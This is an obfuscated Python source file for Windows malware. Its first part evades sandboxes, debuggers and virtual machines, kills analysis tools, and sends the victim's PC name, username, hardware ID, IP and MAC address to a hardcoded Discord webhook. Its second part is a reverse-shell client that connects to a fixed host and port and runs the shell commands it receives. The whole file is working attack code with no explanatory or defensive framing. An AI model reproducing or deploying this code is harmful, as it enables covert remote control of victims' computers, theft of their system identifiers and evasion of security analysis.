q='root'
p='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36'
o='User-Agent'
n='\n'
m='%012x'
l='..'
k=':'
j='None'
i='https://api.ipify.org'
h=getattr
g=len
T=''
S=Exception
O='ascii'
N=False
I='content'
F=str
E=True
import os as A,re,sys as H,wmi,uuid as P,ctypes as B,psutil as J,win32api as K,win32process as L,random
from subprocess import PIPE as M,Popen,check_output as U
from socket import socket as V,AF_INET as W,SOCK_STREAM as X
from signal import signal as Q,SIGINT as Y,SIGTERM as Z
from requests import get as D,post as G
from datetime import datetime as a
from threading import Thread as R
from typing import Tuple
from time import sleep as C
b='https://discord.com/api/webhooks/1000507254820307015/bBHRwxLMs10xseUyhXKlFtqHKb4bFpOwgb9VKLvfxS4JVlfoTeieKRAejFP8RQLDhk7H'
c='192.168.0.2'
d=int('1888')
class e:
	def __init__(B):
		B.api=b;B.vmcheck_switch=E;B.vtdetect_switch=E;B.listcheck_switch=E;B.anti_debug_switch=E
		try:B.ip=D(i).text
		except:B.ip=j
		B.serveruser=A.getenv('UserName');B.pc_name=A.getenv('COMPUTERNAME');B.mac=k.join(re.findall(l,m%P.getnode()));B.computer=wmi.WMI();B.os_info=B.computer.Win32_OperatingSystem()[0];B.os_name=B.os_info.Name.encode('utf-8').split(b'|')[0];B.gpu=B.computer.Win32_VideoController()[0].Name;B.currentplat=B.os_name;B.hwid=U('wmic csproduct get uuid').decode().split(n)[1].strip();B.hwidlist=D('https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/hwid_list.txt');B.pcnamelist=D('https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_name_list.txt');B.pcusernamelist=D('https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_username_list.txt');B.iplist=D('https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/ip_list.txt');B.maclist=D('https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/mac_list.txt');B.gpulist=D('https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/gpu_list.txt');B.platformlist=D('https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_platforms.txt');B.sandboxDLLs=['sbiedll.dll','api_log.dll','dir_watch.dll','pstorec.dll','vmcheck.dll','wpespy.dll'];B.program_blacklist=['httpdebuggerui.exe','wireshark.exe','HTTPDebuggerSvc.exe','fiddler.exe','regedit.exe','taskmgr.exe','vboxservice.exe','df5serv.exe','processhacker.exe','vboxtray.exe','vmtoolsd.exe','vmwaretray.exe','ida64.exe','ollydbg.exe','pestudio.exe','vmwareuser','vgauthservice.exe','vmacthlp.exe','x96dbg.exe','vmsrvc.exe','x32dbg.exe','vmusrvc.exe','prl_cc.exe','prl_tools.exe','xenservice.exe','qemu-ga.exe','joeboxcontrol.exe','ksdumperclient.exe','ksdumper.exe','joeboxserver.exe']
	def post_message(A,msg):G(A.api,headers={o:p},data={I:f"{msg}"})
	def anti_debug(D):
		while E:
			try:
				C(0.7)
				for B in J.process_iter():
					if any((A in B.name().lower()for A in D.program_blacklist)):
						try:D.post_message(f"Anti-Debug Program: {B.name()} was detected running on the system. Closing program...");B.kill();A._exit(1)
						except (J.NoSuchProcess,J.AccessDenied):pass
			except:pass
	def block_dlls(J):
		while E:
			try:
				C(1);B=[];M=L.EnumProcesses()
				for N in M:
					try:
						D=K.OpenProcess(1040,0,N)
						try:
							O=L.EnumProcessModules(D)
							for P in O:
								H=F(L.GetModuleFileNameEx(D,P)).lower()
								for Q in J.sandboxDLLs:
									if Q in H:
										if H not in B:B.append(H)
						finally:K.CloseHandle(D)
					except:pass
				if B:G(f"{J.api}",json={I:f"```yaml\n        The following sandbox-indicative DLLs were discovered loaded in processes running on the system. Do not proceed.\n        Dlls: {B}\n        ```"});A._exit(1)
			except:pass
	def ram_check(E):
		class D(B.Structure):_fields_=[('dwLength',B.c_ulong),('dwMemoryLoad',B.c_ulong),('ullTotalPhys',B.c_ulonglong),('ullAvailPhys',B.c_ulonglong),('ullTotalPageFile',B.c_ulonglong),('ullAvailPageFile',B.c_ulonglong),('ullTotalVirtual',B.c_ulonglong),('ullAvailVirtual',B.c_ulonglong),('sullAvailExtendedVirtual',B.c_ulonglong)]
		C=D();C.dwLength=B.sizeof(D);B.windll.kernel32.GlobalMemoryStatusEx(B.byref(C))
		if C.ullTotalPhys/1073741824<1:G(f"{E.api}",json={I:f"```yaml\n    Ram Check: Less than 4 GB of RAM exists on this system. Exiting program...\n    ```"});A._exit(1)
	def is_debugger(C):
		D=B.windll.kernel32.IsDebuggerPresent()
		if D:G(f"{C.api}",json={I:f"```yaml\n    IsDebuggerPresent: A debugger is present, exiting program...\n    ```"});A._exit(1)
		if B.windll.kernel32.CheckRemoteDebuggerPresent(B.windll.kernel32.GetCurrentProcess(),N)!=0:G(f"{C.api}",json={I:f"```yaml\n    CheckRemoteDebuggerPresent: A debugger is present, exiting program...\n    ```"});A._exit(1)
	def disk_check(D):
		B=50
		if g(H.argv)>1:B=float(H.argv[1])
		E,F,E=K.GetDiskFreeSpaceEx();C=F/1073741824
		if C<B:G(f"{D.api}",json={I:f"```yaml\n    Disk Check: The disk size of this host is {C} GB, which is less than the minimum {B} GB. Exiting program...\n    ```"});A._exit(1)
	def vtdetect(A):G(A.api,headers={o:p},data={I:f"""```yaml
    ![PC DETECTED]!  
    PC Name: {A.pc_name}
    PC Username: {A.serveruser}
    HWID: {A.hwid}
    IP: {A.ip}
    MAC: {A.mac}
    PLATFORM: {A.os_name}
    CPU: {A.computer.Win32_Processor()[0].Name}
    RAM: {F(round(J.virtual_memory().total/1024.0**3))} GB
    GPU: {A.gpu}
    TIME: {a.now().strftime("%Y-%m-%d %H:%M:%S")}```"""})
	def vmcheck(B):
		def C():A=None;return h(H,'base_prefix',A)or h(H,'real_prefix',A)or H.prefix
		def D():return C()!=H.prefix
		if D():B.post_message('**VM DETECTED, EXITING PROGRAM...**');A._exit(1)
		def E():
			C=A.system('REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\DriverDesc 2> nul');D=A.system('REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\ProviderName 2> nul')
			if C!=1 and D!=1:B.post_message('VMware Registry Detected');A._exit(1)
		def F():
			H='SystemRoot';E=A.path.join(A.environ[H],'System32\\vmGuestLib.dll');F=A.path.join(A.environ[H],'vboxmrxnp.dll');G=A.popen('TASKLIST /FI "STATUS eq RUNNING" | find /V "Image Name" | find /V "="').read();C=[]
			for D in G.split(' '):
				if'.exe'in D:C.append(D.replace('K\n',T).replace(n,T))
			if'VMwareService.exe'in C or'VMwareTray.exe'in C:B.post_message('VMwareService.exe & VMwareTray.exe process are running');A._exit(1)
			if A.path.exists(E):B.post_message('**Vmware DLL Detected**');A._exit(1)
			if A.path.exists(F):B.post_message('**VirtualBox DLL Detected**');A._exit(1)
		def G():
			C=k.join(re.findall(l,m%P.getnode()));D=['00:05:69','00:0c:29','00:1c:14','00:50:56']
			if C[:8]in D:B.post_message('**VMware MAC Address Detected**');A._exit(1)
		E(),F(),G();B.post_message('[+] VM Not Detected')
	def listcheck(B):
		D='[ERROR]: Failed to connect to database.'
		try:
			if B.hwid in B.hwidlist.text:B.post_message(f"**Blacklisted HWID Detected. HWID:** `{B.hwid}`");C(2);A._exit(1)
		except:B.post_message(D);C(2);A._exit(1)
		try:
			if B.serveruser in B.pcusernamelist.text:B.post_message(f"**Blacklisted PC User:** `{B.serveruser}`");C(2);A._exit(1)
		except:B.post_message(D);C(2);A._exit(1)
		try:
			if B.pc_name in B.pcnamelist.text:B.post_message(f"**Blacklisted PC Name:** `{B.pc_name}`");C(2);A._exit(1)
		except:B.post_message(D);C(2);A._exit(1)
		try:
			if B.ip in B.iplist.text:B.post_message(f"**Blacklisted IP:** `{B.ip}`");C(2);A._exit(1)
		except:B.post_message(D);C(2);A._exit(1)
		try:
			if B.mac in B.maclist.text:B.post_message(f"**Blacklisted MAC:** `{B.mac}`");C(2);A._exit(1)
		except:B.post_message(D);C(2);A._exit(1)
		try:
			if B.gpu in B.gpulist.text:B.post_message(f"**Blacklisted GPU:** `{B.gpu}`");C(2);A._exit(1)
		except:B.post_message(D);C(2);A._exit(1)
	def start(A):
		A.is_debugger(),A.disk_check(),A.ram_check()
		if A.anti_debug_switch:R(name='Anti-Debug',target=A.anti_debug).start();R(name='Anti-DLL',target=A.block_dlls).start()
		if A.vtdetect_switch:A.vtdetect()
		if A.vmcheck_switch:A.vmcheck()
		if A.listcheck_switch:A.listcheck()
class f:
	def __init__(D,connect=(c,d)):
		Q(Y,D.exit_gracefully);Q(Z,D.exit_gracefully);D.bot_name=F(A.getlogin()).lower();D.temp=A.getenv('temp');D.is_admin=B.windll.shell32.IsUserAnAdmin()!=0;D.public_ip=D.getip();D.stop=N;D.run=N
		while not D.stop:
			try:D._connect(connect)
			except KeyboardInterrupt:continue
			except:C(1)
	def exit_gracefully(B,signum,frame):B.stop=E;B.run=N;B.sock.close();C(1);A._exit(1)
	def _connect(A,connect):A.sock=V(W,X);A.sock.connect(connect);A.start()
	def _recv(B):
		A=B.sock.recv(1024).decode(O)
		if q in A:return A
		else:return A.lower()
	def getip(B):
		try:A=D(i).text
		except:A=j
		return A
	def _shell_run(C,commands):
		B=Popen(commands,shell=E,stdout=M,stderr=M,stdin=M);A=B.stderr.read()+B.stdout.read()
		if g(A)==0:A=b'No Output'
		C.sock.send(A)
	def start(A):
		while E:
			B=A._recv()
			if q in B:
				try:B=B.replace('root ',T);D=F(B);A._shell_run(D)
				except S as C:A.sock.send(f"""

Error:

{C}

========================================================================

""".encode(O))
			elif'admincheck'in B:
				try:A.sock.send(F.encode('Admin privileges'))if A.is_admin==E else A.sock.send(F.encode('NO Admin privileges'))
				except S as C:A.sock.send(f"""

Error:

{C}

========================================================================

""".encode(O))
			elif B=='kill':A.sock.send(F.encode('Client Killed'));A.sock.close();A.exit_gracefully(0,0)
			elif B=='getip':
				try:A.sock.send(F.encode(A.public_ip))
				except S as C:A.sock.send(f"""

Error:

{C}

========================================================================

""".encode(O))
			else:A.sock.send(F.encode('Invalid Command'))
def r():
	try:D('https://google.com')
	except:A._exit(1)
	e().start();f()